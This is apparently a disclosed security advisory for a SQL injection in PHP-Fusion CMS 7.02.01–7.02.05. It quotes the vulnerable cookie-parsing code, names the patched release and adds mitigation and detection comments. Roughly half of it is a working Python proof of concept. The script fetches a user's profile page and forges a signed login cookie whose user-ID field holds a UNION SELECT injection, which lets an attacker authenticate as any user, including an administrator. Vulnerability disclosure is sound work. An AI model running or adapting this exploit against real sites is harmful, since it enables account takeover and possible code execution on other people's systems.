PHP-Fusion 7.02.05 SQL Injection
------enig2PSNXGBKMXPFWUGNIURDS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
A SQL injection vulnerability exists in PHP-Fusion CMS releases 7.02.01 through 7.02.05. The vulnerability allows an attacker to authenticate as an arbitrary user and act with that user's rights, which might lead to code execution. Because of the simplicity of exploitation, the potential risk is very high. The Magic Quotes feature protects against this coding flaw. Version 7.02.06 fixes the presented security problem.
Affected file: includes/classes/Authenticate.class.php
023: define("COOKIE_USER", COOKIE_PREFIX."user");
024: define("COOKIE_ADMIN", COOKIE_PREFIX."admin");
147: $cookieDataArr =3D explode(".", $_COOKIE[COOKIE_USER]);
150: list($userID, $cookieExpiration, $cookieHash) =3D $cookieDataArr;
153: $result =3D dbquery(
154: "SELECT * FROM ".DB_USERS."
155: WHERE user_id=3D'".$userID."' AND user_status=3D'0' AND user_act=
iontime=3D'0'
156: LIMIT 1"
157: );
195: $cookieDataArr =3D explode(".", $_COOKIE[COOKIE_ADMIN]);
197: list($userID, $cookieExpiration, $cookieHash) =3D $cookieDataArr;
200: $result =3D dbquery(
201: "SELECT user_admin_algo, user_admin_salt FROM ".DB_USERS."
202: WHERE user_id=3D'".$userID."' AND user_level>101 AND user_statu=
s=3D'0' AND user_actiontime=3D'0'
203: LIMIT 1"
204: );
# Proof of Concept
# PHP-Fusion 7.02.05
# Authentication spoofing
# Author: vnd at vndh.net
from http import client
from time import time
import hashlib
import hmac
import re
def generateCookie(address, path, userid, password =3D 'admin'):
"""
Proof-of-concept from the advisory above (the listing is quoted-printable
as extracted: `=3D` reads as `=`, and a trailing `=` is a soft line break).

Fetches profile.php for `userid` on `address`/`path` to learn the cookie
prefix and the display name, then returns (cookie_name, cookie_value) where
cookie_value is "<user_id field>.<expiration>.<hash>" and the user_id field
is a quoted SQL fragment rather than a number. Its value here is as evidence
of the flaw at Authenticate.class.php line 155 (quoted above): the first
dot-separated field of COOKIE_USER is concatenated into the query without
escaping. Mitigation is to validate that field as an integer (or parameterize
the query) before it reaches dbquery(); for detection, a COOKIE_USER whose
first field is non-numeric is a clear indicator of an attempt.

Raises BaseException (not an Exception subclass, so `except Exception` will
not catch it) on a non-200 response or when no "<prefix>lastvisit" cookie
is present in the response.
"""
# Fetch the target user's public profile page; its status, Set-Cookie header
# and body are all consumed below.
connection =3D client.HTTPConnection(address)
connection.request("GET", "%s/profile.php?lookup=3D%d" % (path, userid)=
)
response =3D connection.getresponse()
if response.status !=3D 200: raise BaseException("bad status")
# Derive the COOKIE_USER name from the "<prefix>lastvisit" cookie the server
# sets: COOKIE_USER is COOKIE_PREFIX."user" (advisory line 023).
cookies =3D response.getheader("Set-Cookie")
pattern =3D re.compile("([A-Z0-9\_]+)lastvisit", re.IGNORECASE)
cookiesearch =3D pattern.search(cookies)
if cookiesearch =3D=3D None: raise BaseException("bad cookie")
cookiename =3D cookiesearch.groups()
cookiename =3D "%suser" % cookiename[0]
# Pull the display name out of the profile HTML marker; pattern.search()
# returning None (marker absent) would raise AttributeError here.
source =3D response.read()
connection.close()
source =3D source.decode("utf-8")
pattern =3D re.compile("<!--profile_user_name-->(.*)<")
username =3D pattern.search(source).groups()
username =3D username[0]
# The forged user_id field. After the server's explode(".") (advisory line
# 147) this whole string is what line 155 interpolates unescaped; the
# trailing "-- " comments out the remainder of the server's WHERE clause.
# The column count and values are tailored to DB_USERS; their individual
# meaning is not derivable from this advisory.
injection =3D "-1' union select %d,'%s','sha256','','%s'%s,101%s -- " %=
(userid, username, password, ",0" * 15,",0" * 12)
# Expiry one day ahead, as a Unix timestamp string (second cookie field).
expiration =3D str(int(time() + 86400))
# Two chained HMAC-SHA256 rounds over injection+expiration: the first keyed
# with the empty string, the second keyed with the first hex digest.
# Presumably mirrors how the server derives the cookie hash for the row the
# fragment produces -- not verifiable from the advisory text. The bytes(...)
# wrappers around .encode() are redundant.
userhash =3D ""
userhash =3D hmac.new(bytes(userhash.encode("utf-8")), bytes(("%s%s" % =
(injection, expiration)).encode("utf-8")), hashlib.sha256).hexdigest()
userhash =3D hmac.new(bytes(userhash.encode("utf-8")), bytes(("%s%s" % =
(injection, expiration)).encode("utf-8")), hashlib.sha256).hexdigest()
# Cookie value layout "<user_id field>.<expiration>.<hash>" matches the
# three-way list() unpacking on advisory line 150.
return (cookiename, ".".join([injection, expiration, userhash]))
Reference: https://vndh.net/note:php-fusion-70205-sql-injection
Patched version: http://www.php-fusion.co.uk/downloads.php?cat_id=23&download_id=264
------enig2PSNXGBKMXPFWUGNIURDS
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/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=0S02
-----END PGP SIGNATURE-----
------enig2PSNXGBKMXPFWUGNIURDS--